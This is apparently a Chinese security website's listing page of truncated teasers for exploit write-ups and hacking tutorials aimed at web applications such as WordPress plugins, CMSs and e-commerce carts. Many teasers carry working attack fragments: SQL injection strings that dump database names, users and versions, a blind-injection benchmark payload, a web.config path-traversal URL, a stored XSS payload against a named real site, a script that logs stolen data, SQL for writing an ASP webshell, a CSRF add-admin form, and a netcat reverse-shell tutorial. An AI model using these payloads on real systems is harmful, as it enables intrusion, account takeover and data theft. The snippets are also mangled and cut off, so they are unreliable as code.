utf-7 bom后续 - 网站安全 - 自学php关注热度:22

今天tcpper让我帮忙测一个url，结果无意发现微软似乎在某个补丁中针对utf-7 bom 做了些限制。win7+ie8下测试：ie识别网页的编码顺序 依然是 bom server content-type中的 charset但如果server cont.....[详情]

博客安全系列之WordPress - 网站安全 - 自学php关注热度:35

今天谈Wordpress的安全..最近WORDPRESS一直很不安全..0DAY漏洞经常有~所以就需要对程序进行安全设置==========================================================第一步:设置可执行。将wp-content,wp-includes,w....[详情]

ValtNet (photogallery.html?id_categoria) 远程sql注射缺陷及关注热度:25

ehsan_hp200 hotmail com################################ IRANIAN THE BEST HACKERS IN THE WORLD ###################################### ######################## Remote SQL injection Vu.....[详情]

Concrete CMS 5.4.1.1及更低版本跨站脚本缺陷及修复关注热度:23

YGN Ethical Hacker Group (lists yehg net)Concrete CMS 5.4.1.1 = Cross Site Scripting1. 概述Concrete CMS 5.4.1.1及低版本脚本跨站缺陷2. 背景Concrete5 makes running a website ea.....[详情]

Help Request System 1.1g XSRF (加管理账号)缺陷及修复关注热度:21

标题: Help Request System 1.1g XSRF (add admin)作者 G13开发网站: http://freehelpdesk.org/测试版本: 1.1ghtmlbodyform id=edit method=postaction=http://www.2cto.com /request/in.....[详情]

cuteeditor编辑器利用方法两则 - 网站安全 - 自学关注热度:21

方法1.直接下载load.ashx配置文件http://www.2cto.com /CuteSoft_Client/CuteEditor/Load.ashx?type=imagefile=../../../web.config然后查看一些sql配置信息 从sql数据库连接入手connectionStringsadd na.....[详情]

多特网多个注入漏洞及修复 - 网站安全 - 自学p关注热度:29

详细：http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=1http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=2http://db.duowan.com/zx2/eqinfo.php?id=25294发现人：etcat修复：过滤.....[详情]

Access溢出+跨裤得到shell - 网站安全 - 自学php关注热度:14

最近检测的这个站设置很变态,什么都没有,连FSO都删了,好不容易找到一个宝贵的注入,点几经周折进了后台,看到可以更改上传类型,大喜,可是怎么改也改不了,最后发现上传类型记录在co..[详情]

DV Cart Shopping Cart software SQL注射缺陷及修复 - 网站关注热度:28

标题: DV Cart (E-Commerce System) SQL Injection作者: Eyup CELIK系统官方: http://www.esmistudio.com www.2cto.com影响所有版本危害：sql注射可被用于非法命令输入示例index.php?keyword=SQL In.....[详情]

Bonza Digital Cart脚本注射缺陷及修复 - 网站安全关注热度:18

标题: Bonzo Cart (E-Commerce System) SQL Injection作者: Eyup CELIK开发者: http://www.turnkeycentral.com www.2cto.com影响所有版本危害：脚本注射可被用于命令输入示例searchresults.php?ord1=.....[详情]

Web Solutions Wcs2u SQL注射缺陷及修复 - 网站安全 -关注热度:18

Web Solutions Wcs2u SQL Injection Vulnerability系统开发者：http://www.wcs2u.com/ www.2cto.comtempe_mendoan failed404@gmail.com测试方法[raquo;] http://www.2cto.com /index.php?id=[SQL][ra.....[详情]

知乎一个存储型跨站漏洞及修复 - 网站安全 - 自关注热度:19

简要描述：只做了简单的过滤，很容易绕过。详细说明：个人简介过滤不严，在很多地方都会调用个人简介。#x3ciframe/onload=alert(/xss/)插入以上代码别人看到你个人主页，或者看到你回答..[详情]

XSS截获网站后台路径脚本 - 网站安全 - 自学php关注热度:19

cook.php?$info = $_SERVER[#39;QUSEY_STRING#39;];if ($info) {$fp = fopen(info.txt.a);fwrite($fp.$info.\n);fclose($fp);}?使用代码：插入:img name=ak width=0 height=0 border=0.....[详情]

WordPress的3.2.1核心模块post-template.php XSS漏洞及修复关注热度:17

Author : Darshit AsharaDate : 21/08/2011Vendor : WordpressVersion: 3.2.1WordPress核心模块不正确的代码（post-template.php）导致跨站点脚本。笔者可以简单地更新view plaincopy to clipboardpr.....[详情]

WordPress插件MM Duplicate <= 1.2 SQL注射缺陷及修复关注热度:15

标题: WordPress MM Duplicate plugin = 1.2 SQL Injection Vulnerability作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm www.2cto.com)下载地址: http://downloads.wordpre.....[详情]

Redlab CMS多重sql注射缺陷及修复 - 网站安全 - 自学关注热度:18

标题： Site by Redlab Multiple Vulnerabilities官方 : http://www.redlab.net/ www.2cto.com作者 : tempe_mendoan devilzc0de.tempe@gmail.com##############################################===[.....[详情]

access导出webshell - 网站安全 - 自学php关注热度:22

cnbird#39;s blogcreate table cmd(shell text)insert into cmd (shell) values(#39;%execute request(1)%#39;)SELECT shell into [fuck] in #39;D:\web\me\backdoorx\asp.asp;x.xls#39; .....[详情]

使用NC反弹Shell - 网站安全 - 自学php关注热度:59

在进行Shell反弹时，有时会碰到服务器不支持PHP或者WebShell无法成功反弹Shell的情况，例如有的服务器只支持JSP，不支持PHP。此时，可以同样采用Windows下的经典的NC反弹Shell方法。在Windo..[详情]

V5shop两个文件的注入漏洞及修复 - 网站安全 - 自关注热度:19

漏洞危害：高危一、漏洞文件：cart.aspx搜索关键词：inurl:scoreindex.aspxexp ：/cart.aspx?act=buyid=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124).....[详情]

Mysql5+php注入查看MYSQL基本信息(库名,版本,用户)关注热度:20

and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*二.查数据库and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limi.....[详情]

EasySiteEdit远程文件包含缺陷及修复 - 网站安全关注热度:16

Exploit Title: EasySiteEdit remote file include作者:koskesh jakesh下载地址: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip# Tested on: linux---------------------------.....[详情]

OneFileCMS v1.1.1多重远程缺陷及修复 - 网站安全 -关注热度:26

标题: OneFileCMS v.1.1.1 Multiple Remote Vulnerabilities作者: mr.pr0n (@_pr0n_)# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr下载地址: http://onefilecms.com/downloa.....[详情]

盛大云网站配置不当导致文件解析漏洞及修复关注热度:22

简要描述：盛大云网站存在漏洞，可以直接获得网站权限。详细说明：nginx文件解析漏洞漏洞证明：http://www.grandcloud.cn/robots.txt/x.php网站用的PHPCMS，找个上传点，如会员的头像上传模块。..[详情]

mysql数据截断 - 网站安全 - 自学php关注热度:23

LengF：在看《PHP高级漏洞审核技术》认真的看了这两点，暂且记下。对于很多web应用文件在很多功能是不容许重复数据的，比如用户注册功能等。一般的应用程序对于提交注册的username和..[详情]

马克斯CMS(Maxcms) admin_inc.asp SQL注入漏洞及修复 -关注热度:111

在文件admin/ admin_inc.asp中：Sub checkPower //第103行 dim loginValidate,rsObj : loginValidate = maxcms2.0 err.clear on error resume next set rsObj=conn.db(select m_random,m_le.....[详情]

asp.net+mysql后台盲注入 - 网站安全 - 自学php关注热度:23

后台的登录注入点，不过悲剧的是无回显只能盲注。更悲剧的是mysql数据库是5一下的版本！不过还好站点是asp.net程序的使程序报错后能显示一些信息。 正文开始吧。 目标站点找了一圈..[详情]

WordPress多个插件注入漏洞及修复 - 网站安全 - 自关注热度:29

1:OdiHost Newsletter plugin = 1.0POC:http://www.2cto.com /wp-content/plugins/odihost-newsletter-plugin/includes/openstat.php?uid=-1id=-1 AND 1=IF(21,BENCHMARK(5000000,MD5(CHAR(115,113,10.....[详情]

译文：XSS绕过过滤 - 网站安全 - 自学php关注热度:23

如果你不知道如何进行XSS攻击，那么本文或许对你没有任何帮助。这里主要针对已经对基本的XSS攻击有所了解而想更加深入地理解关于绕过过滤的细节问题 的读者。文中不会告诉你如何..[详情]

Axis Commerce (E-Commerce System)存储型XSS - 网站安全关注热度:32

标题: Axis Commerce (E-Commerce System) Stored XSS作者: Eyup CELIK下载地址: https://github.com/downloads/axis/axiscommerce/axis-0.8.1.zip已测试版本: 0.8.1 and previus测试平台: Apache .....[详情]

WordPress插件UnGallery <= 1.5.8本地文件泄露缺陷及关注热度:17

标题: WordPress UnGallery plugin = 1.5.8 Local File Disclosure Vulnerability作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)下载地址: http://downloads.wordpress.org/.....[详情]